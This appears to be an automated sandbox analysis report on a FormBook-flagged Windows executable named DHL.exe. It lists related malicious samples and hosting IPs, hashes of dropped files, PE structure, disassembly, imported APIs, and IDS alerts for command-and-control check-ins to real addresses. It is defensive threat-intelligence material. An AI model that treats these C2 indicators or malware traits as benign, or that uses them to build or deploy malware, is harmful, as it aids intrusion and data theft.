                                                      1k24tbb-00241346.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                      • 172.67.201.49
                                                      file.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                      • 104.21.36.239
                                                      www.juewucangku.xyzPp7OXMFwqhXKx5Y.exeGet hashmaliciousFormBookBrowse
                                                      • 8.136.96.106
                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      CLOUDFLARENETUSSFHgtxFGtB.ps1Get hashmaliciousUnknownBrowse
                                                      • 104.21.87.65
                                                      DG55Gu1yGM.exeGet hashmaliciousLummaCBrowse
                                                      • 104.21.56.70
                                                      he55PbvM2G.exeGet hashmaliciousLummaCBrowse
                                                      • 104.21.56.70
                                                      fsg5PWtTm2.lnkGet hashmaliciousRedLine, SectopRATBrowse
                                                      • 104.21.87.65
                                                      1iC0WTxgUf.exeGet hashmaliciousUnknownBrowse
                                                      • 104.18.0.75
                                                      Instruction_695-18112-002_Rev.PDF.lnk.d.lnkGet hashmaliciousUnknownBrowse
                                                      • 104.21.83.229
                                                      https://essind.freshdesk.com/en/support/solutions/articles/157000010576-pedido-553268637Get hashmaliciousUnknownBrowse
                                                      • 104.17.25.14
                                                      seethebestmethodwithgreatnessgoodnewsgreatdaygivenme.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                      • 104.21.84.67
                                                      sweetnesswithgreatnessiwthbestthingswithmebackickmegreatthings.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                      • 172.67.187.200
                                                      createdbetterthingswithgreatnressgivenmebackwithnice.htaGet hashmaliciousCobalt Strike, FormBookBrowse
                                                      • 104.21.84.67
                                                      CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd2.elfGet hashmaliciousUnknownBrowse
                                                      • 120.27.219.157
                                                      1.elfGet hashmaliciousUnknownBrowse
                                                      • 118.31.126.94
                                                      1.batGet hashmaliciousUnknownBrowse
                                                      • 120.26.208.69
                                                      236236236.elfGet hashmaliciousUnknownBrowse
                                                      • 59.110.43.24
                                                      x86_64.elfGet hashmaliciousMiraiBrowse
                                                      • 8.144.123.120
                                                      powerpc.elfGet hashmaliciousUnknownBrowse
                                                      • 8.164.124.114
                                                      arm7.elfGet hashmaliciousUnknownBrowse
                                                      • 121.41.250.118
                                                      arm6.elfGet hashmaliciousUnknownBrowse
                                                      • 47.102.72.29
                                                      mips.elfGet hashmaliciousUnknownBrowse
                                                      • 8.189.60.225
                                                      ppc.elfGet hashmaliciousUnknownBrowse
                                                      • 59.82.118.117
                                                      FORTRESSITXUSla.bot.mipsel.elfGet hashmaliciousMiraiBrowse
                                                      • 65.98.32.221
                                                      Salmebogs(1).exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                      • 69.57.163.64
                                                      http://dimfa.elcompanies.digitalillustra.comGet hashmaliciousUnknownBrowse
                                                      • 65.181.111.144
                                                      RN# D7521-RN-00353 REV-2.exeGet hashmaliciousFormBookBrowse
                                                      • 69.57.163.227
                                                      RFQ 3100185 MAHAD.exeGet hashmaliciousFormBookBrowse
                                                      • 69.57.163.227
                                                      RN# D7521-RN-00353 REV-2.exeGet hashmaliciousFormBookBrowse
                                                      • 69.57.163.227
                                                      PO No-5100002069 Sr. No. 11 & PO No-5100002072 Sr. No. 8,10,17..exeGet hashmaliciousFormBookBrowse
                                                      • 69.57.163.227
                                                      INVOICE_PO# PUO202300054520249400661.exeGet hashmaliciousFormBookBrowse
                                                      • 69.57.163.227
                                                      TCP-F02-24-1437-HRSC24110281.exeGet hashmaliciousFormBookBrowse
                                                      • 69.57.163.227
                                                      Ponta Saheb. PO 4400049817.exeGet hashmaliciousFormBookBrowse
                                                      • 69.57.163.227
                                                      No context
                                                      No context
                                                      Process:C:\Users\user\Desktop\DHL.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):289280
                                                      Entropy (8bit):7.991653149827653
                                                      Encrypted:true
                                                      SSDEEP:6144:nvyIpdOHEXtPCnr2oX7Bz2azjzPT8H1Tut1tQ:n6xEdQR2aPzPoH1/
                                                      MD5:360EE5A2247C1737186E79AEA27CA312
                                                      SHA1:CF4F5C98B7BDC225B10684569C6F147F072A574D
                                                      SHA-256:3914823347F847A1E88137555E00DC20B6BBA63C16087AC3D6017C5F3ACBA9DF
                                                      SHA-512:9BCB450C5B6A59160F92C63E84BB586B46F022E84238D0E435A03BE984EC5DC833D74B37F319537644CCE24E3DA558AE2F30417ACC883D13ABAF03AAE7A0FAE0
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:...6F6F56023..Q6.6F52023.WQ6E6F52023HWQ6E6F52023HWQ6E6F52023.WQ6K).;2.;.i.Pz...][C.C:86D$[fVS^\\<w3SeD3[.Y\.....(Y"P.=?9lWQ6E6F5K1;.u76.xV!..PU.R....V!.(...t76._....PU..>2^xV!.2023HWQ6.sF5~133"XxnE6F52023.WS7N7M52h63HWQ6E6F5.$23HGQ6EFB520r3HGQ6E4F54023HWQ6C6F52023H'U6E4F52023JW..E6V52 23HWA6E&F52023XWQ6E6F52023HWQ6E6F52023HWQ6E6F52023HWQ6E6F52023HWQ6E6F52023HWQ6E6F52023HWQ6E6F52023HWQ6E6F52023HWQ6E6F52023HWQ6E6F52023HWQ6E6F52023f#4N16F5.f63HGQ6EnB52 23HWQ6E6F52023hWQVE6F52023HWQ6E6F52023HWQ6E6F52023HWQ6E6F52023HWQ6E6F52023HWQ6E6F52023HWQ6E6F52023HWQ6E6F52023HWQ6E6F52023HWQ6E6F52023HWQ6E6F52023HWQ6E6F52023HWQ6E6F52023HWQ6E6F52023HWQ6E6F52023HWQ6E6F52023HWQ6E6F52023HWQ6E6F52023HWQ6E6F52023HWQ6E6F52023HWQ6E6F52023HWQ6E6F52023HWQ6E6F52023HWQ6E6F52023HWQ6E6F52023HWQ6E6F52023HWQ6E6F52023HWQ6E6F52023HWQ6E6F52023HWQ6E6F52023HWQ6E6F52023HWQ6E6F52023HWQ6E6F52023HWQ6E6F52023HWQ6E6F52023HWQ6E6F52023HWQ6E6F52023HWQ6E6F52023HWQ6E6F52023HWQ6E6F52023HWQ6E6F52023HWQ6E6F52023HWQ6E6F52023HWQ6E6F52023HWQ6
                                                      Process:C:\Windows\SysWOW64\wiaacmgr.exe
                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                      Category:dropped
                                                      Size (bytes):196608
                                                      Entropy (8bit):1.1209886597424439
                                                      Encrypted:false
                                                      SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8QbnVcxjONC4Je5Q:r2qOB1nxCkvSAELyKOMq+8QTQKC+
                                                      MD5:EFD26666EAE0E87B32082FF52F9F4C5E
                                                      SHA1:603BFE6A7D6C0EC4B8BA1D38AEA6EFADDC42B5E0
                                                      SHA-256:67D4CAA4255418EB18873F01597D1F4257C4146D1DCED78E26D5FD76B783F416
                                                      SHA-512:28ADD7B8D88795F191567FD029E9F8BC9AEF7584CE3CD56DB40BBA52BC8335F2D8E53A5CE44C153C13A31FD0BE1D76D1E558A4AA5987D5456C000C4D64F08EAA
                                                      Malicious:false
                                                      Reputation:moderate, very likely benign file
                                                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                      Process:C:\Users\user\Desktop\DHL.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):289280
                                                      Entropy (8bit):7.991653149827653
                                                      Encrypted:true
                                                      SSDEEP:6144:nvyIpdOHEXtPCnr2oX7Bz2azjzPT8H1Tut1tQ:n6xEdQR2aPzPoH1/
                                                      MD5:360EE5A2247C1737186E79AEA27CA312
                                                      SHA1:CF4F5C98B7BDC225B10684569C6F147F072A574D
                                                      SHA-256:3914823347F847A1E88137555E00DC20B6BBA63C16087AC3D6017C5F3ACBA9DF
                                                      SHA-512:9BCB450C5B6A59160F92C63E84BB586B46F022E84238D0E435A03BE984EC5DC833D74B37F319537644CCE24E3DA558AE2F30417ACC883D13ABAF03AAE7A0FAE0
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:...6F6F56023..Q6.6F52023.WQ6E6F52023HWQ6E6F52023HWQ6E6F52023.WQ6K).;2.;.i.Pz...][C.C:86D$[fVS^\\<w3SeD3[.Y\.....(Y"P.=?9lWQ6E6F5K1;.u76.xV!..PU.R....V!.(...t76._....PU..>2^xV!.2023HWQ6.sF5~133"XxnE6F52023.WS7N7M52h63HWQ6E6F5.$23HGQ6EFB520r3HGQ6E4F54023HWQ6C6F52023H'U6E4F52023JW..E6V52 23HWA6E&F52023XWQ6E6F52023HWQ6E6F52023HWQ6E6F52023HWQ6E6F52023HWQ6E6F52023HWQ6E6F52023HWQ6E6F52023HWQ6E6F52023HWQ6E6F52023HWQ6E6F52023HWQ6E6F52023f#4N16F5.f63HGQ6EnB52 23HWQ6E6F52023hWQVE6F52023HWQ6E6F52023HWQ6E6F52023HWQ6E6F52023HWQ6E6F52023HWQ6E6F52023HWQ6E6F52023HWQ6E6F52023HWQ6E6F52023HWQ6E6F52023HWQ6E6F52023HWQ6E6F52023HWQ6E6F52023HWQ6E6F52023HWQ6E6F52023HWQ6E6F52023HWQ6E6F52023HWQ6E6F52023HWQ6E6F52023HWQ6E6F52023HWQ6E6F52023HWQ6E6F52023HWQ6E6F52023HWQ6E6F52023HWQ6E6F52023HWQ6E6F52023HWQ6E6F52023HWQ6E6F52023HWQ6E6F52023HWQ6E6F52023HWQ6E6F52023HWQ6E6F52023HWQ6E6F52023HWQ6E6F52023HWQ6E6F52023HWQ6E6F52023HWQ6E6F52023HWQ6E6F52023HWQ6E6F52023HWQ6E6F52023HWQ6E6F52023HWQ6E6F52023HWQ6E6F52023HWQ6E6F52023HWQ6
                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                      Entropy (8bit):7.176256347840463
                                                      TrID:
                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                      • DOS Executable Generic (2002/1) 0.02%
                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                      File name:DHL.exe
                                                      File size:1'257'984 bytes
                                                      MD5:12e3c1457416b5622f040f8e0edc0298
                                                      SHA1:74a88947c14538bf6ba2dccdeed472820159dc2c
                                                      SHA256:1a2f0649b6a928da703f8ab11ace25807dff07e0e5310f995b9acb378cd1c6a5
                                                      SHA512:8c670937acd7c8844cf3e8cec215ab34e65aeb86a1de570cc156bd59785da748d7c4e422739595d3846fed6b72d5eb38ab41859d8bd7d7c60e7444699ebd9a86
                                                      SSDEEP:24576:iqDEvCTbMWu7rQYlBQcBiT6rprG8afd99HWql9OM9kYe7R4L7R:iTvC/MTQYxsWR7afxWuOM9kla
                                                      TLSH:9445C0027391D062FFAB92334F5AF61156BD6E260123E51F13A82DB9BE701B1163E763
                                                      File Content Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......................j:......j:..C...j:......@.*...............................n.......~.............{.......{.......{.........z....
                                                      Icon Hash:3535113131313333
                                                      Entrypoint:0x420577
                                                      Entrypoint Section:.text
                                                      Digitally signed:false
                                                      Imagebase:0x400000
                                                      Subsystem:windows gui
                                                      Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                      DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                      Time Stamp:0x6760BA99 [Mon Dec 16 23:41:13 2024 UTC]
                                                      TLS Callbacks:
                                                      CLR (.Net) Version:
                                                      OS Version Major:5
                                                      OS Version Minor:1
                                                      File Version Major:5
                                                      File Version Minor:1
                                                      Subsystem Version Major:5
                                                      Subsystem Version Minor:1
                                                      Import Hash:948cc502fe9226992dce9417f952fce3
                                                      Instruction
                                                      call 00007FD930B22B93h
                                                      jmp 00007FD930B2249Fh
                                                      push ebp
                                                      mov ebp, esp
                                                      push esi
                                                      push dword ptr [ebp+08h]
                                                      mov esi, ecx
                                                      call 00007FD930B2267Dh
                                                      mov dword ptr [esi], 0049FDF0h
                                                      mov eax, esi
                                                      pop esi
                                                      pop ebp
                                                      retn 0004h
                                                      and dword ptr [ecx+04h], 00000000h
                                                      mov eax, ecx
                                                      and dword ptr [ecx+08h], 00000000h
                                                      mov dword ptr [ecx+04h], 0049FDF8h
                                                      mov dword ptr [ecx], 0049FDF0h
                                                      ret
                                                      push ebp
                                                      mov ebp, esp
                                                      push esi
                                                      push dword ptr [ebp+08h]
                                                      mov esi, ecx
                                                      call 00007FD930B2264Ah
                                                      mov dword ptr [esi], 0049FE0Ch
                                                      mov eax, esi
                                                      pop esi
                                                      pop ebp
                                                      retn 0004h
                                                      and dword ptr [ecx+04h], 00000000h
                                                      mov eax, ecx
                                                      and dword ptr [ecx+08h], 00000000h
                                                      mov dword ptr [ecx+04h], 0049FE14h
                                                      mov dword ptr [ecx], 0049FE0Ch
                                                      ret
                                                      push ebp
                                                      mov ebp, esp
                                                      push esi
                                                      mov esi, ecx
                                                      lea eax, dword ptr [esi+04h]
                                                      mov dword ptr [esi], 0049FDD0h
                                                      and dword ptr [eax], 00000000h
                                                      and dword ptr [eax+04h], 00000000h
                                                      push eax
                                                      mov eax, dword ptr [ebp+08h]
                                                      add eax, 04h
                                                      push eax
                                                      call 00007FD930B2523Dh
                                                      pop ecx
                                                      pop ecx
                                                      mov eax, esi
                                                      pop esi
                                                      pop ebp
                                                      retn 0004h
                                                      lea eax, dword ptr [ecx+04h]
                                                      mov dword ptr [ecx], 0049FDD0h
                                                      push eax
                                                      call 00007FD930B25288h
                                                      pop ecx
                                                      ret
                                                      push ebp
                                                      mov ebp, esp
                                                      push esi
                                                      mov esi, ecx
                                                      lea eax, dword ptr [esi+04h]
                                                      mov dword ptr [esi], 0049FDD0h
                                                      push eax
                                                      call 00007FD930B25271h
                                                      test byte ptr [ebp+08h], 00000001h
                                                      pop ecx
                                                      Programming Language:
                                                      • [ C ] VS2008 SP1 build 30729
                                                      • [IMP] VS2008 SP1 build 30729
                                                      NameVirtual AddressVirtual Size Is in Section
                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0xc8e640x17c.rdata
                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0xd40000x5c75c.rsrc
                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x1310000x7594.reloc
                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0xb0ff00x1c.rdata
                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_TLS0xc34000x18.rdata
                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xb10100x40.rdata
                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_IAT0x9c0000x894.rdata
                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                      .text0x10000x9ab1d0x9ac000a1473f3064dcbc32ef93c5c8a90f3a6False0.565500681542811data6.668273581389308IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                      .rdata0x9c0000x2fb820x2fc00c9cf2468b60bf4f80f136ed54b3989fbFalse0.35289185209424084data5.691811547483722IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                      .data0xcc0000x706c0x480053b9025d545d65e23295e30afdbd16d9False0.04356553819444445DOS executable (block device driver @\273\)0.5846666986982398IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                      .rsrc0xd40000x5c75c0x5c800cb6814b4b6c2c8c40b4bee71b3959041False0.9637616131756757data7.956395165601416IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                      .reloc0x1310000x75940x7600c68ee8931a32d45eb82dc450ee40efc3False0.7628111758474576data6.7972128181359786IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                      RT_ICON0xd43b00x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                      RT_ICON0xd44d80x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024EnglishGreat Britain0.7304964539007093
                                                      RT_ICON0xd49400x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096EnglishGreat Britain0.6348499061913696
                                                      RT_ICON0xd59e80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216EnglishGreat Britain0.5590248962655602
                                                      RT_STRING0xd7f900x594dataEnglishGreat Britain0.3333333333333333
                                                      RT_STRING0xd85240x68adataEnglishGreat Britain0.2735961768219833
                                                      RT_STRING0xd8bb00x490dataEnglishGreat Britain0.3715753424657534
                                                      RT_STRING0xd90400x5fcdataEnglishGreat Britain0.3087467362924282
                                                      RT_STRING0xd963c0x65cdataEnglishGreat Britain0.34336609336609336
                                                      RT_STRING0xd9c980x466dataEnglishGreat Britain0.3605683836589698
                                                      RT_STRING0xda1000x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                                      RT_RCDATA0xda2580x55ff3data1.0003293181127801
                                                      RT_GROUP_ICON0x13024c0x30dataEnglishGreat Britain0.9166666666666666
                                                      RT_GROUP_ICON0x13027c0x14dataEnglishGreat Britain1.15
                                                      RT_VERSION0x1302900xdcdataEnglishGreat Britain0.6181818181818182
                                                      RT_MANIFEST0x13036c0x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823
                                                      DLLImport
                                                      WSOCK32.dllgethostbyname, recv, send, socket, inet_ntoa, setsockopt, ntohs, WSACleanup, WSAStartup, sendto, htons, __WSAFDIsSet, select, accept, listen, bind, inet_addr, ioctlsocket, recvfrom, WSAGetLastError, closesocket, gethostname, connect
                                                      VERSION.dllGetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
                                                      WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                      COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                                                      MPR.dllWNetGetConnectionW, WNetCancelConnection2W, WNetUseConnectionW, WNetAddConnection2W
                                                      WININET.dllHttpOpenRequestW, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, InternetConnectW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetQueryDataAvailable
                                                      PSAPI.DLLGetProcessMemoryInfo
                                                      IPHLPAPI.DLLIcmpSendEcho, IcmpCloseHandle, IcmpCreateFile
                                                      USERENV.dllDestroyEnvironmentBlock, LoadUserProfileW, CreateEnvironmentBlock, UnloadUserProfile
                                                      UxTheme.dllIsThemeActive
                                                      KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetShortPathNameW, DeleteFileW, IsDebuggerPresent, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, LoadResource, LockResource, SizeofResource, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, LoadLibraryW, GetLocalTime, CompareStringW, GetCurrentThread, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, VirtualAlloc, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, ResetEvent, WaitForSingleObjectEx, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, CloseHandle, GetFullPathNameW, GetStartupInfoW, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, SetLastError, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, ResumeThread, FreeLibraryAndExitThread, GetACP, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetStringTypeW, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, ReadConsoleW, GetTimeZoneInformation, FindFirstFileExW, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableA, SetCurrentDirectoryW, FindNextFileW, WriteConsoleW
                                                      USER32.dllGetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, PeekMessageW, GetInputState, UnregisterHotKey, CharLowerBuffW, MonitorFromPoint, MonitorFromRect, LoadImageW, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, ClientToScreen, GetCursorPos, DeleteMenu, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, LockWindowUpdate, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, RegisterHotKey, GetCursorInfo, SetWindowPos, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, TrackPopupMenuEx, GetMessageW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, DispatchMessageW, keybd_event, TranslateMessage, ScreenToClient
                                                      GDI32.dllEndPath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, GetDeviceCaps, SetPixel, CloseFigure, LineTo, AngleArc, MoveToEx, Ellipse, CreateCompatibleBitmap, CreateCompatibleDC, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, SelectObject, StretchBlt, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, GetDIBits, StrokePath
                                                      COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                                                      ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, RegCreateKeyExW, GetSecurityDescriptorDacl, GetAclInformation, GetUserNameW, AddAce, SetSecurityDescriptorDacl, InitiateSystemShutdownExW
                                                      SHELL32.dllDragFinish, DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW
                                                      ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
                                                      OLEAUT32.dllCreateStdDispatch, CreateDispTypeInfo, UnRegisterTypeLib, UnRegisterTypeLibForUser, RegisterTypeLibForUser, RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, VariantChangeType, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysStringLen, QueryPathOfRegTypeLib, SysAllocString, VariantInit, VariantClear, DispCallFunc, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, SafeArrayDestroyDescriptor, VariantCopy, OleLoadPicture
                                                      Language of compilation systemCountry where language is spokenMap
                                                      EnglishGreat Britain
                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                      2024-12-17T08:24:13.599131+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.849709185.199.110.15380TCP
                                                      2024-12-17T08:24:16.358783+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.849710185.199.110.15380TCP
                                                      2024-12-17T08:24:19.108224+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.849711185.199.110.15380TCP
                                                      2024-12-17T08:24:28.902939+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.849713104.21.48.23380TCP
                                                      2024-12-17T08:24:31.494241+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.849714104.21.48.23380TCP
                                                      2024-12-17T08:24:31.494241+01002856318ETPRO MALWARE FormBook CnC Checkin (POST) M41192.168.2.849714104.21.48.23380TCP
                                                      2024-12-17T08:24:34.406390+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.849715104.21.48.23380TCP
